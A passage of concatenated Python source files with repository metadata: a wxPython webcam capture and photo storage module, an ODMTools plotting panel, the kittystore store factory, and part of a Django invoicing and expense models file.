dc = wx.ClientDC(self)
dc.Clear()
pencolour = wx.Colour(180, 0, 0, wx.ALPHA_OPAQUE)
brushcolour = wx.Colour(180, 0, 0, wx.ALPHA_OPAQUE)
dc.SetPen(wx.Pen(pencolour))
dc.SetBrush(wx.Brush(brushcolour))
rect = wx.Rect(0,0, 450, 200)
rect.SetPosition((100, 100))
dc.DrawRoundedRectangleRect(rect, 8)
message = 'Unable to open video device.\nIs there one connected?\n\n' \
'Click here to retry.'
dc.SetTextForeground('white')
dc.DrawText(message, 280, 170)
dc.SetFont(boldfont)
dc.DrawText('Error', 280, 140)
dc.DrawBitmap(bitmap, offset[0], offset[1], False)
self._error += 1
def onClick(self, event):
self._error = 1 #For some reason it'll dissapear otherwise.
self.displayError(self.errorBitmap, (128, 128))
self.Unbind(wx.EVT_LEFT_UP)
self.open(self.camera)
def save(self, record=-1):
"""
Captures, crops, and saves a webcam frame. Pass an explicit record number
otherwise writes to next in sequence. Returns zero-padded photo reference ID.
"""
img = highgui.cvQueryFrame(self.cap)
img = opencv.cvGetMat(img)
#No BGR => RGB conversion needed for PIL output.
pil = opencv.adaptors.Ipl2PIL(img) #convert to a PIL
#~ pil = pil.crop((80, 0, 560, 480))
#~ pil.show()
return self.store.savePIL(pil, record)
#~ try:
#~ pil.save(file)
#~ except KeyError:
#~ pil.save(file+'.jpg')
class Storage:
"""
Crops, resizes, stores, and retrieves images for the database.
"""
def __init__(self):
self.log = logging.getLogger(__name__)
#~ self.log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] %(module)-6s [%(levelname)-8s] %(message)s')
ch.setFormatter(formatter)
self.log.addHandler(ch)
self.log.debug("Created webcam storage instance.")
store = conf.config['webcam']['store'].lower()
if store == 'local':
self.log.debug("Configured for local storage.")
self.store = 'local'
olddir = os.getcwd()
os.chdir(os.path.join(conf.homepath, '.taxidi'))
self.target = os.path.abspath(conf.config['webcam']['target'])
self.thumbs = os.path.abspath(conf.config['webcam']['thumbs'])
os.chdir(olddir) #Switch back to old cwd
#See if target directories exist, and create if needed.
for target in [self.target, self.thumbs]:
if not os.path.exists(target):
#Doesn't exist, try to create:
self.log.warn("Directory {0} doesn't exist. Attempting to create...".format(target))
try:
os.makedirs(target)
except error as e:
self.log.error(e)
self.log.error("Directory already exists or permission denied when creating directory.")
raise
self.log.debug("Target: {0}".format(self.target))
self.log.debug("Thumbs: {0}".format(self.thumbs))
elif store == 'remote':
self.store = 'remote' #TODO remote storage (low priority)
def savePIL(self, image, record=-1):
"""
Saves an image in PIL format, cropping & resizing if needed, and creating
a thumbnail.
`image`: A valid PIL instance.
`record`: Explicit id (integer) to save the image to (as a reference).
All other values are determined from [webcam] section in config.
If record is -1, the id will be automatically determined by the first
available slot. Returns zero-padded ID as string.
"""
if ((image.size[0] != 640) and (image.size[1] != 480)) or \
((image.size[0] != 480) and (image.size[1] != 480)):
#Scale up/down:
print "Scale"
image.thumbnail((480, 480))
if image.size != (480, 480):
#Crop it down.
print "Crop"
image = image.crop((80, 0, 560, 480))
if record >= 0: #Explicit file
record = str(record).zfill(6)
else: #Determine automatically
record = str(self._getNextSlot()).zfill(6)
filename = os.path.join(self.target, record + '.jpg')
self.log.debug("Saving image as {0}...".format(filename))
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
#Create & save thumbnails:
image.thumbnail((128, 128))
filename = os.path.join(self.thumbs, record + '.jpg')
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
return record
def getThumbnail100(self, record):
"""
Returns a 100x100 wxBitmap given a record number.
"""
pil = Image.open(self.getThumbnailPath(record))
pil.thumbnail((100, 100))
image = wx.EmptyImage(*pil.size)
image.SetData(pil.convert("RGB").tostring())
return wx.BitmapFromImage(image)
def saveImage(self, filename, record=-1):
"""
Like savePIL(), but accepts local filename as argument instead.
Used for inserting a custom image into the photo database.
"""
try:
image = Image.open(filename)
except IOError as e:
self.log.error(e)
self.log.error('Unable to copy image.')
raise
#From a webcam most likely:
if image.size == (640, 480):
image = image.crop((80, 0, 560, 480))
#Scale to fit
image.thumbnail((480, 480), Image.ANTIALIAS)
if record >= 0: #Explicit file
record = str(record).zfill(6)
else: #Determine automatically
record = str(self._getNextSlot()).zfill(6)
filename = os.path.join(self.target, record + '.jpg')
self.log.debug("Saving image as {0}...".format(filename))
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
#Create & save thumbnails:
image.thumbnail((128, 128), Image.ANTIALIAS) #User higher quality for custom images
filename = os.path.join(self.thumbs, record + '.jpg')
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
return record
def delete(self, record):
try:
os.unlink(self.getImagePath(record))
os.unlink(self.getThumbnailPath(record))
except OSError as e:
self.log.error(e)
self.log.error("Unable to unlink files for photo record {0}".format(record))
def _getNextSlotAdvanced(self): #FIXME
files = []
ret = []
for dirname, dirnames, filenames in os.walk(self.target):
for name in filenames:
files.append(int(name.strip('.jpg')))
files.sort()
for k, g in groupby(enumerate(files), lambda (i, x): i - x):
ret.append(map(itemgetter(1), g))
return int(ret[1][-1]) + 1
def _getNextSlot(self):
files = []
for filename in os.listdir(self.target):
if filename.endswith('.jpg'):
files.append(int(filename.strip('.jpg')))
files.sort()
if len(files) == 0:
return 0
return int(files[-1]) + 1
def getImagePath(self, record):
"""
Returns the full file path for a photo record (local).
"""
try:
return os.path.join(self.target, str(int(record)).zfill(6) + '.jpg')
except ValueError:
return None
def getThumbnailPath(self, record):
"""
Returns full file path for a photo record thumbnail (local).
"""
return os.path.join(self.thumbs, str(int(record)).zfill(6) + '.jpg')
t_CONTROLS_SAVE = wx.NewEventType()
CONTROLS_SAVE = wx.PyEventBinder(t_CONTROLS_SAVE, 1)
t_CONTROLS_CANCEL = wx.NewEventType()
CONTROLS_CANCEL = wx.PyEventBinder(t_CONTROLS_CANCEL, 1)
t_CONTROLS_SELECT_FILE = wx.NewEventType()
CONTROLS_SELECT_FILE = wx.PyEventBinder(t_CONTROLS_SELECT_FILE, 1)
class Controls(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# Controls
self.button_play = wx.Button(self, label="Take Picture", size=(140, 50))
self.button_cancel = wx.Button(self, label="Cancel", size=(140, 50))
self.button_file = wx.Button(self, label="Pick File...", size=(290, 30))
# Sizers
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(self.button_play, 0, wx.ALL, border=5)
sizer.Add(self.button_cancel, 0, wx.ALL, border=5)
bsizer = wx.BoxSizer(wx.VERTICAL)
bsizer.Add(sizer)
bsizer.Add(self.button_file, 0, wx.ALL, border=5)
csizer = wx.BoxSizer(wx.HORIZONTAL)
csizer.AddStretchSpacer()
csizer.Add(bsizer)
csizer.AddStretchSpacer()
self.SetSizer(csizer)
# Events
self.button_play.Bind(wx.EVT_BUTTON, self.Snapshot)
self.button_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)
self.button_file.Bind(wx.EVT_BUTTON, self.OnFile)
def Snapshot(self, evt):
evt2 = wx.PyCommandEvent(t_CONTROLS_SAVE, self.GetId())
self.GetEventHandler().ProcessEvent(evt2)
evt.Skip()
def OnCancel(self, evt):
evt2 = wx.PyCommandEvent(t_CONTROLS_CANCEL, self.GetId())
self.GetEventHandler().ProcessEvent(evt2)
evt.Skip()
def OnFile(self, evt):
evt2 = wx.PyCommandEvent(t_CONTROLS_SELECT_FILE, self.GetId())
self.GetEventHandler().ProcessEvent(evt2)
evt.Skip()
class Panel(wx.Panel):
def __init__(self, parent):
"""
This is the master webcam capture panel.
"""
self.log = logging.getLogger(__name__)
wx.Panel.__init__(self, parent, style=wx.NO_BORDER)
self.log.debug('Created webcam capture panel.')
# Controls
device = int(conf.config['webcam']['device'])
self.log.debug('Using OpenCV device {0}'.format(device))
self.live = LivePanel(self, device)
self.controls = Controls(self)
# Sizer
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.live, 1, wx.RIGHT|wx.EXPAND, 4)
sizer.Add(self.controls, 0, wx.ALL|wx.EXPAND, 4)
self.SetSizer(sizer)
# Events
self.controls.Bind(CONTROLS_SAVE, self.OnSave)
self.controls.Bind(CONTROLS_CANCEL, self.OnStop)
self.controls.Bind(CONTROLS_SELECT_FILE, self.OnFile)
self.controls.SetBackgroundColour('#005889') #TODO: source colours from theme.
self.live.SetBackgroundColour('#005889')
self.SetBackgroundColour('#005889')
#Variables:
self.overwrite = None
#Storage instance:
self.PhotoStorage = Storage()
def OnSave(self, evt):
"""
Internal event for saving an image from the webcam.
Read the reference ID with GetFile().
"""
if self.overwrite != None:
self.fileSelection = self.live.save(self.overwrite)
else:
self.fileSelection = self.live.save()
self.overwrite = None
evt.Skip()
def SetOverwrite(self, record):
self.overwrite = record
def OnStop(self, evt):
"""
Hides the panel and suspends video input.
"""
self.log.debug('Hide & suspend webcam panel.')
self.Hide()
self.live.suspend()
evt.Skip()
def OnFile(self, evt):
"""
Internal event for the CONTROLS_SELECT_FILE event.
Read the selection with GetFile().
"""
self.live.suspend()
initial_dir = os.getcwd()
dlg = ib.ImageDialog(self, initial_dir)
dlg.Centre()
#TODO: Process file selection
if dlg.ShowModal() == wx.ID_OK:
# show the selected file
self.fileSelection = dlg.GetFile()
evt.Skip()
else:
self.fileSelection = None
dlg.Destroy()
self.live.resume()
def GetFile(self):
"""
Retrieve the file selected by the user after the
CONTROLS_SELECT_FILE event.
"""
return self.fileSelection
class CameraError(Exception):
def __init__(self, value=''):
if value == '':
self.error = 'Generic camera error.'
else:
self.error = value
def __str__(self):
return repr(self.error)
def getVideoDevices():
"""
Returns a list of available system video devices by name.
Pass index of this list to video capture class to use that device
(Linux only) or pass -1 to use the first available video device.
Note that this may have issues on some implementations of OpenCV.
"""
try:
import subprocess
devices = subprocess.check_output(
'for I in /sys/class/video4linux/*; do cat $I/name; done',
shell=True)
except AttributeError:
#Python < 2.7, use os.popen instead.
fdev = os.popen('for I in /sys/class/video4linux/*; do cat $I/name; done')
devices = fdev.read()
fdev.close()
#Cast to list and
devices = devices.split('\n')[:-1] #Remove trailing \n
return devices
if __name__ == '__main__':
import opencv
from opencv import cv, highgui
app = wx.PySimpleApp()
pFrame = wx.Frame(None, -1, "Webcam Viewer", size = (640, 560))
Panel(pFrame)
pFrame.Show()
app.MainLoop()
| gpl-3.0 | 3,329,031,220,949,620,700 | 32.641682 | 112 | 0.586349 | false |
ODM2/ODMToolsPython | odmtools/gui/pnlPlot.py | 1 | 7003 | #Boa:FramePanel:Panel1
import wx
from wx.lib.pubsub import pub as Publisher
try:
from agw import flatnotebook as fnb
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.flatnotebook as fnb
import matplotlib
matplotlib.use('WXAgg')
import plotTimeSeries
import plotSummary
import plotHistogram
import plotBoxWhisker
import plotProbability
from odmtools.controller.logicPlotOptions import SeriesPlotInfo
import logging
# from odmtools.common.logger import LoggerTool
#
# tool = LoggerTool()
# logger = tool.setupLogger(__name__, __name__ + '.log', 'w', logging.DEBUG)
logger =logging.getLogger('main')
[wxID_PANEL1, wxID_PAGEBOX, wxID_PAGEHIST, wxID_PAGEPROB,
wxID_PAGESUMMARY, wxID_PAGETIMESERIES, wxID_TABPLOTS
] = [wx.NewId() for _init_ctrls in range(7)]
class pnlPlot(fnb.FlatNotebook):
def __init__(self, parent, taskserver):
self.taskserver = taskserver
self._init_ctrls(parent)
self.initPubSub()
self.parent = parent
def _init_ctrls(self, parent):
fnb.FlatNotebook.__init__(self, id=wxID_TABPLOTS, name=u'tabPlots',
parent=parent, pos=wx.Point(0, 0), size=wx.Size(491, 288),
agwStyle=fnb.FNB_NODRAG | fnb.FNB_HIDE_TABS)
# style |= fnb.FNB_HIDE_TABS
# self.book.SetAGWWindowStyleFlag(style)
self.pltTS = plotTimeSeries.plotTimeSeries(id=wxID_PAGETIMESERIES, name='pltTS',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltTS, 'TimeSeries')
self.pltProb = plotProbability.plotProb(id=wxID_PAGEPROB, name='pltProb',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltProb, 'Probablity')
self.pltHist = plotHistogram.plotHist(id=wxID_PAGEHIST, name='pltHist',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltHist, 'Histogram')
self.pltBox = plotBoxWhisker.PlotBox(id=wxID_PAGEBOX, name='pltBox',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltBox, 'Box/Whisker')
self.pltSum = plotSummary.plotSummary(id=wxID_PAGESUMMARY, name=u'pltSum',
parent=self, pos=wx.Point(784, 256), size=wx.Size(437, 477),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltSum, 'Summary')
self._seriesPlotInfo = None
self.editID = None
self.legendVisible = False
def initPubSub(self):
Publisher.subscribe(self.onDateChanged, "onDateChanged")
Publisher.subscribe(self.onDateFull, "onDateFull")
Publisher.subscribe(self.onPlotType, "onPlotType")
Publisher.subscribe(self.onShowLegend, "onShowLegend")
Publisher.subscribe(self.onNumBins, "onNumBins")
Publisher.subscribe(self.onRemovePlot, "removePlot")
Publisher.subscribe(self.onRemovePlots, "removeMultPlot")
Publisher.subscribe(self.onChangeSelection, "changePlotSelection")
Publisher.subscribe(self.onUpdateValues, "updateValues")
Publisher.subscribe(self.clear, "clearPlot")
def onUpdateValues(self, event):
self.pltTS.updateValues()
def onChangeSelection(self, datetime_list):
self.pltTS.changePlotSelection( datetime_list)
def onNumBins(self, numBins):
self.pltHist.changeNumOfBins(numBins)
def onDateChanged(self, startDate, endDate):
self._seriesPlotInfo.updateDateRange(startDate, endDate)
self.redrawPlots()
def onDateFull(self):
self._seriesPlotInfo.updateDateRange()
self.redrawPlots()
# Reset the date to the full date
def onPlotType(self, event, ptype):
self.pltTS.onPlotType(ptype)
self.pltProb.onPlotType(ptype)
def onShowLegend(self, event, isVisible):
try:
self.pltTS.onShowLegend(isVisible)
self.pltProb.onShowLegend(isVisible)
self.legendVisible = isVisible
except AttributeError:
pass
def stopEdit(self):
self._seriesPlotInfo.stopEditSeries()
self.editID = None
self.pltTS.stopEdit()
self.redrawPlots()
def addEditPlot(self, memDB, seriesID, record_service):
self.record_service = record_service
if not self._seriesPlotInfo:
self._seriesPlotInfo = SeriesPlotInfo(memDB, self.taskserver)
self.editID = seriesID
self._seriesPlotInfo.setEditSeries(self.editID)
self.pltTS.setEdit(self.editID)
self.redrawPlots()
def addPlot(self, memDB, seriesID):
"""
Creates the plot
"""
logger.debug("Adding plot")
Publisher.sendMessage("EnablePlotButton", plot=self.getActivePlotID(), isActive=True)
if not self._seriesPlotInfo:
self._seriesPlotInfo = SeriesPlotInfo(memDB, self.taskserver)
self._seriesPlotInfo.update(seriesID, True)
logger.debug("Redrawing plots")
self.redrawPlots()
def onRemovePlot(self, seriesID):
self._seriesPlotInfo.update(seriesID, False)
self.redrawPlots()
def onRemovePlots(self, seriesIDs):
for series in seriesIDs:
self._seriesPlotInfo.update(series.id, False)
self.redrawPlots()
def redrawPlots(self):
logger.debug("Plot Summary")
self.pltSum.Plot(self._seriesPlotInfo)
logger.debug("Plot Probability")
self.pltProb.Plot(self._seriesPlotInfo)
logger.debug("Plot Boxwhisker")
self.pltBox.Plot(self._seriesPlotInfo)
logger.debug("Plot Timeseries")
self.pltTS.Plot(self._seriesPlotInfo)
logger.debug("Plot Histogram")
self.pltHist.Plot(self._seriesPlotInfo)
self.onShowLegend(event=None, isVisible=self.legendVisible)
maxStart, maxEnd, currStart, currEnd = self._seriesPlotInfo.getDates()
Publisher.sendMessage("resetdate", startDate=maxStart, endDate=maxEnd, currStart=currStart, currEnd=currEnd)
def selectPlot(self, value):
self.SetSelection(value)
def getActivePlotID(self):
return self.GetSelection()
def close(self):
self.pltTS.close()
def clear(self):
"""
:return:
"""
if self._seriesPlotInfo:
for seriesID in self._seriesPlotInfo.getSeriesIDs():
self._seriesPlotInfo.update(seriesID, False)
self.redrawPlots()
| bsd-3-clause | -7,721,344,204,155,205,000 | 33.328431 | 116 | 0.622305 | false |
hyperkitty/kittystore | kittystore/__init__.py | 1 | 3228 | # -*- coding: utf-8 -*-
"""
Module entry point: call get_store() to instanciate a KittyStore
implementation.
Copyright (C) 2012 Aurelien Bompard
Author: Aurelien Bompard <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or (at
your option) any later version.
See http://www.gnu.org/copyleft/gpl.html for the full text of the
license.
"""
from __future__ import absolute_import, print_function, unicode_literals
__all__ = ("get_store", "create_store", "MessageNotFound",
"SchemaUpgradeNeeded")
from kittystore.search import SearchEngine
from kittystore.caching import register_events
def _check_settings(settings):
required_keys = ("KITTYSTORE_URL", "KITTYSTORE_SEARCH_INDEX",
"MAILMAN_REST_SERVER", "MAILMAN_API_USER",
"MAILMAN_API_PASS")
for req_key in required_keys:
try:
getattr(settings, req_key)
except AttributeError:
raise AttributeError("The settings file is missing the \"%s\" key" % req_key)
if settings.KITTYSTORE_URL.startswith("mongo://"):
raise NotImplementedError
def _get_search_index(settings):
search_index_path = settings.KITTYSTORE_SEARCH_INDEX
if search_index_path is None:
return None
return SearchEngine(search_index_path)
def get_store(settings, debug=None, auto_create=False):
"""Factory for a KittyStore subclass"""
_check_settings(settings)
if debug is None:
debug = getattr(settings, "KITTYSTORE_DEBUG", False)
search_index = _get_search_index(settings)
if getattr(settings, "KITTYSTORE_USE_STORM", False):
from kittystore.storm import get_storm_store
store = get_storm_store(settings, search_index, debug, auto_create)
else:
from kittystore.sa import get_sa_store
store = get_sa_store(settings, search_index, debug, auto_create)
if search_index is not None and search_index.needs_upgrade():
if auto_create:
search_index.upgrade(store)
else:
store.close()
raise SchemaUpgradeNeeded()
register_events()
return store
def create_store(settings, debug=None):
"""Factory for a KittyStore subclass"""
_check_settings(settings)
if debug is None:
debug = getattr(settings, "KITTYSTORE_DEBUG", False)
search_index = _get_search_index(settings)
if getattr(settings, "KITTYSTORE_USE_STORM", False):
from kittystore.storm import get_storm_store, create_storm_db
version = create_storm_db(settings, debug)
store = get_storm_store(settings, search_index, debug)
else:
from kittystore.sa import create_sa_db, get_sa_store
version = create_sa_db(settings, debug)
store = get_sa_store(settings, search_index, debug)
if search_index is not None and search_index.needs_upgrade():
search_index.upgrade(store)
return store, version
class SchemaUpgradeNeeded(Exception):
"""Raised when there are pending patches"""
class MessageNotFound(Exception):
pass
| gpl-3.0 | 1,805,717,560,906,570,800 | 32.278351 | 89 | 0.682156 | false |
fgaudin/aemanager | accounts/models.py | 1 | 20254 | # coding=utf-8
from decimal import Decimal
from django.utils.formats import localize
import datetime
from reportlab.platypus import Paragraph, Spacer
from reportlab.lib.units import inch
from reportlab.platypus import Table, TableStyle
from django.db import models, connection
from core.models import OwnedObject
from django.utils.translation import ugettext_lazy as _, ugettext
from contact.models import Contact
from django.core.urlresolvers import reverse
from project.models import Row, Proposal, update_row_amount, \
ROW_CATEGORY_SERVICE, ROW_CATEGORY, PROPOSAL_STATE_ACCEPTED, ProposalRow, \
VAT_RATES_2_1, VAT_RATES_5_5, VAT_RATES_19_6
from django.db.models.aggregates import Sum, Min, Max
from django.db.models.signals import post_save, pre_save, post_delete
from django.core.validators import MaxValueValidator
from accounts.utils.pdf import InvoiceTemplate
PAYMENT_TYPE_CASH = 1
PAYMENT_TYPE_BANK_CARD = 2
PAYMENT_TYPE_TRANSFER = 3
PAYMENT_TYPE_CHECK = 4
PAYMENT_TYPE_PAYPAL = 5
PAYMENT_TYPE_DEBIT = 6
PAYMENT_TYPE = ((PAYMENT_TYPE_CASH, _('Cash')),
(PAYMENT_TYPE_BANK_CARD, _('Bank card')),
(PAYMENT_TYPE_TRANSFER, _('Transfer')),
(PAYMENT_TYPE_CHECK, _('Check')),
(PAYMENT_TYPE_PAYPAL, _('Paypal')),
(PAYMENT_TYPE_DEBIT, _('Debit')))
class Expense(OwnedObject):
date = models.DateField(verbose_name=_('Date'), help_text=_('format: mm/dd/yyyy'), db_index=True)
reference = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('Reference'))
supplier = models.CharField(max_length=70, blank=True, null=True, verbose_name=_('Supplier'))
amount = models.DecimalField(max_digits=12, decimal_places=2, verbose_name=_('Amount'))
payment_type = models.IntegerField(choices=PAYMENT_TYPE, verbose_name=_('Payment type'))
description = models.CharField(max_length=100, blank=True, null=True, verbose_name=_('Description'))
class InvoiceAmountError(Exception):
pass
class InvoiceIdNotUniqueError(Exception):
pass
class InvalidInvoiceIdError(Exception):
pass
MAX_INVOICE_ID = 999999999
INVOICE_STATE_EDITED = 1
INVOICE_STATE_SENT = 2
INVOICE_STATE_PAID = 3
INVOICE_STATE = ((INVOICE_STATE_EDITED, _('Edited')),
(INVOICE_STATE_SENT, _('Sent')),
(INVOICE_STATE_PAID, _('Paid')))
class InvoiceManager(models.Manager):
def get_next_invoice_id(self, owner):
return (Invoice.objects.filter(owner=owner).aggregate(invoice_id=Max('invoice_id'))['invoice_id'] or 0) + 1
def get_paid_sales(self, owner, reference_date=None):
if not reference_date:
reference_date = datetime.date.today()
amount_sum = self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__lte=reference_date,
paid_date__year=reference_date.year).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_paid_service_sales(self, owner, year=None):
if not year:
year = datetime.date.today().year
amount_sum = InvoiceRow.objects.filter(invoice__state=INVOICE_STATE_PAID,
owner=owner,
category=ROW_CATEGORY_SERVICE,
invoice__paid_date__year=year).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_waiting_payments(self, owner):
amount_sum = self.filter(state=INVOICE_STATE_SENT,
owner=owner).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_waiting_service_payments(self, owner):
amount_sum = InvoiceRow.objects.filter(invoice__state=INVOICE_STATE_SENT,
owner=owner,
category=ROW_CATEGORY_SERVICE).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_late_invoices(self, owner):
late_invoices = self.filter(state=INVOICE_STATE_SENT,
payment_date__lt=datetime.date.today(),
owner=owner)
return late_invoices
def get_late_invoices_for_notification(self):
late_invoices = self.filter(state=INVOICE_STATE_SENT,
payment_date__lt=datetime.date.today(),
owner__notification__notify_late_invoices=True)
return late_invoices
def get_invoices_to_send(self, owner):
invoices_to_send = self.filter(state=INVOICE_STATE_EDITED,
edition_date__lte=datetime.date.today(),
owner=owner)
return invoices_to_send
def get_invoices_to_send_for_notification(self):
invoices_to_send = self.filter(state=INVOICE_STATE_EDITED,
edition_date__lte=datetime.date.today(),
owner__notification__notify_invoices_to_send=True)
return invoices_to_send
def get_paid_sales_for_period(self, owner, begin_date, end_date):
if not begin_date or not end_date:
return 0
amount_sum = self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__gte=begin_date,
paid_date__lte=end_date).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_waiting_sales_for_period(self, owner, end_date, begin_date=None):
if not end_date:
return 0
amount_sum = self.filter(state__lte=INVOICE_STATE_SENT,
owner=owner,
payment_date__lte=end_date)
if begin_date:
amount_sum = amount_sum.filter(payment_date__gte=begin_date)
amount_sum = amount_sum.aggregate(waiting=Sum('amount'))
return amount_sum['waiting'] or 0
def get_first_invoice_paid_date(self, owner):
return self.filter(owner=owner).aggregate(min_date=Min('paid_date'))['min_date']
def get_paid_invoices(self, owner, begin_date=None):
if not begin_date:
return self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__year=datetime.date.today().year).order_by('paid_date')
else:
return self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__lte=datetime.date.today(),
paid_date__gte=begin_date).order_by('paid_date')
def get_waiting_invoices(self, owner):
return self.filter(state__lte=INVOICE_STATE_SENT,
owner=owner).order_by('payment_date')
def get_to_be_invoiced(self, owner):
accepted_proposal_amount_sum = Proposal.objects.filter(state=PROPOSAL_STATE_ACCEPTED,
owner=owner).extra(where=['project_proposal.ownedobject_ptr_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).aggregate(amount=Sum('amount'))
# exclude amount found in sent or paid invoices referencing accepted proposal, aka computing already invoiced from not sold proposal
invoicerows_to_exclude = InvoiceRow.objects.extra(where=['accounts_invoicerow.proposal_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).exclude(invoice__state=INVOICE_STATE_EDITED).filter(owner=owner).aggregate(amount=Sum('amount'))
# adding invoice rows of edited invoices which don't have proposal linked
invoicerows_whithout_proposals = InvoiceRow.objects.filter(owner=owner,
proposal=None,
invoice__state=INVOICE_STATE_EDITED).aggregate(amount=Sum('amount'))
return (accepted_proposal_amount_sum['amount'] or 0) - (invoicerows_to_exclude['amount'] or 0) + (invoicerows_whithout_proposals['amount'] or 0)
def get_service_to_be_invoiced(self, owner):
accepted_proposal_amount_sum = ProposalRow.objects.filter(proposal__state=PROPOSAL_STATE_ACCEPTED,
category=ROW_CATEGORY_SERVICE,
owner=owner).extra(where=['project_proposal.ownedobject_ptr_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).aggregate(amount=Sum('amount'))
invoicerows_to_exclude = InvoiceRow.objects.filter(proposal__state=PROPOSAL_STATE_ACCEPTED,
category=ROW_CATEGORY_SERVICE,
owner=owner).extra(where=['accounts_invoicerow.proposal_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).exclude(invoice__state=INVOICE_STATE_EDITED).filter(owner=owner).aggregate(amount=Sum('amount'))
return (accepted_proposal_amount_sum['amount'] or 0) - (invoicerows_to_exclude['amount'] or 0)
def get_vat_for_period(self, owner, begin_date, end_date):
if not begin_date or not end_date:
return 0
amount_sum_2_1 = InvoiceRow.objects.filter(vat_rate=VAT_RATES_2_1,
invoice__state=INVOICE_STATE_PAID,
invoice__owner=owner,
invoice__paid_date__gte=begin_date,
invoice__paid_date__lte=end_date).aggregate(vat=Sum('amount'))
amount_sum_5_5 = InvoiceRow.objects.filter(vat_rate=VAT_RATES_5_5,
invoice__state=INVOICE_STATE_PAID,
invoice__owner=owner,
invoice__paid_date__gte=begin_date,
invoice__paid_date__lte=end_date).aggregate(vat=Sum('amount'))
amount_sum_19_6 = InvoiceRow.objects.filter(vat_rate=VAT_RATES_19_6,
invoice__state=INVOICE_STATE_PAID,
invoice__owner=owner,
invoice__paid_date__gte=begin_date,
invoice__paid_date__lte=end_date).aggregate(vat=Sum('amount'))
return (amount_sum_2_1['vat'] or 0) * VAT_RATES_2_1 / 100\
+ (amount_sum_5_5['vat'] or 0) * VAT_RATES_5_5 / 100\
+ (amount_sum_19_6['vat'] or 0) * VAT_RATES_19_6 / 100
class Invoice(OwnedObject):
customer = models.ForeignKey(Contact, blank=True, null=True, verbose_name=_('Customer'))
invoice_id = models.IntegerField(verbose_name=_("Invoice id"))
state = models.IntegerField(choices=INVOICE_STATE, default=INVOICE_STATE_EDITED, verbose_name=_("State"), db_index=True)
amount = models.DecimalField(blank=True, max_digits=12, decimal_places=2, default=0, verbose_name=_("Amount"))
edition_date = models.DateField(verbose_name=_("Edition date"), help_text=_('format: mm/dd/yyyy'), db_index=True)
payment_date = models.DateField(verbose_name=_("Payment date"), help_text=_('format: mm/dd/yyyy'), db_index=True)
payment_type = models.IntegerField(choices=PAYMENT_TYPE, blank=True, null=True, verbose_name=_('Payment type'))
paid_date = models.DateField(blank=True, null=True, verbose_name=_("Paid date"), help_text=_('format: mm/dd/yyyy'), db_index=True)
execution_begin_date = models.DateField(blank=True, null=True, verbose_name=_("Execution begin date"), help_text=_('format: mm/dd/yyyy'))
execution_end_date = models.DateField(blank=True, null=True, verbose_name=_("Execution end date"), help_text=_('format: mm/dd/yyyy'))
penalty_date = models.DateField(blank=True, null=True, verbose_name=_("Penalty date"), help_text=_('format: mm/dd/yyyy'))
penalty_rate = models.DecimalField(blank=True, null=True, max_digits=4, decimal_places=2, verbose_name=_("Penalty rate"))
discount_conditions = models.CharField(max_length=100, blank=True, null=True, verbose_name=_("Discount conditions"))
footer_note = models.CharField(max_length=90, blank=True, null=True, verbose_name=_('Footer note'))
objects = InvoiceManager()
class Meta:
ordering = ['invoice_id']
def __unicode__(self):
return "<a href=\"%s\">%s</a>" % (reverse('invoice_detail', kwargs={'id' : self.id}), ugettext("invoice #%d") % (self.invoice_id))
def isInvoiceIdValid(self):
validator = MaxValueValidator(MAX_INVOICE_ID)
try:
validator(self.invoice_id)
except:
return False
return True
def isInvoiceIdUnique(self, owner):
invoices = Invoice.objects.filter(owner=owner,
invoice_id=self.invoice_id)
if self.id:
invoices = invoices.exclude(id=self.id)
if len(invoices):
return False
return True
def getNature(self):
